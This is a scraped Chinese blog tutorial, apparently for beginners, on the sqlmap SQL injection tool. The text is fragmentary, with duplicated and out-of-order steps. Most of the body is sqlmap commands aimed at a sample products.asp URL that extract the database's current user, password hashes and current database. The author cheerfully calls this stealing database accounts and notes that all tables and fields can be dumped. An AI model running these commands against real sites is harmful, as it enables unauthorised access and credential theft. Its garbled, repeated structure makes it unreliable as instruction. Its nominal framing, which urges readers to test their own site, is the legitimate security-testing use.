快捷搜索:  汽车  科技

python数据攻击工具:python的sql注入工具sqlmap 渗透利器

python数据攻击工具:python的sql注入工具sqlmap 渗透利器5、查看数据库的使用用户以及密码,基本就是盗号了,盗数据库的号,加-current-user和--passwords: python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

看见没有,可以把你的数据库名字爆出来,多猛!

4、查看当前库,加上--current-db参数。

python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

python数据攻击工具:python的sql注入工具sqlmap 渗透利器(1)

5、查看数据库的使用用户以及密码,基本就是盗号了,盗数据库的号,加-current-user和--passwords:

python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

python数据攻击工具:python的sql注入工具sqlmap 渗透利器(2)

python数据攻击工具:python的sql注入工具sqlmap 渗透利器(3)

6、除了这些还可以爆出数据库的所有数据库字段,所有数据库表,所有数据库。

基本你的数据库就被人端了!!哈哈,快测测自己的网站吧。

就介绍到这里啦!欢迎关注小编,后续有更多的小白工具哦。

码子不易!!欢迎关注博客。

禁止转载,现在盗版太严重,无语了。

猜您喜欢: